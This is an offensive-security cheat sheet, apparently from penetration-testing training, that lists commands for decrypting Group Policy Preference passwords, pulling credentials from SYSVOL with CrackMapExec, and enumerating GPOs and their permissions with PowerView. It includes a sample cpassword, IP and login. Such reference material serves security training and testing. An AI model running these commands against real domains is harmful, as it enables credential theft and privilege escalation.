Group Policy Enumeration & Attacks

This section covers various techniques used to enumerate and exploit Group Policy Objects (GPOs) within a Windows domain environment.

1. Decrypt Group Policy Preference Password

Command:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

• Description: Tool used to decrypt a captured Group Policy Preference (GPP) password from a Linux-based host.

---

2. Locate Group Policy Preference Credentials

Command:

crackmapexec smb -L | grep gpp

• Description: Locates and retrieves a Group Policy Preference password using CrackMapExec, then filters the output using grep. Performed from a Linux-based host.

Command:

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

• Description: Locates and retrieves any credentials stored in the SYSVOL share of a Windows target using CrackMapExec. Performed from a Linux-based host.

---

3. Enumerate Group Policy Objects (GPOs)

Command:

Get-DomainGPO | select displayname

• Description: PowerView tool used to enumerate GPO names in a target Windows domain. Performed from a Windows-based host.

Command:

Get-GPO -All | Select DisplayName

• Description: PowerShell command used to enumerate all GPO names. Performed from a Windows-based host.

---

4. Check Permissions on GPOs

Command:

$sid=Convert-NameToSid "Domain Users"

• Description: Creates a variable $sid that stores the SID of the "Domain Users" group. Performed from a Windows-based host.

Command:

Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}

• Description: PowerView tool used to check if "Domain Users" have any rights over GPOs. Performed from a Windows-based host.

---

5. Retrieve GPO Details Using GUID

Command:

Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

• Description: Retrieves detailed information about a GPO using its GUID. Performed from a Windows-based host.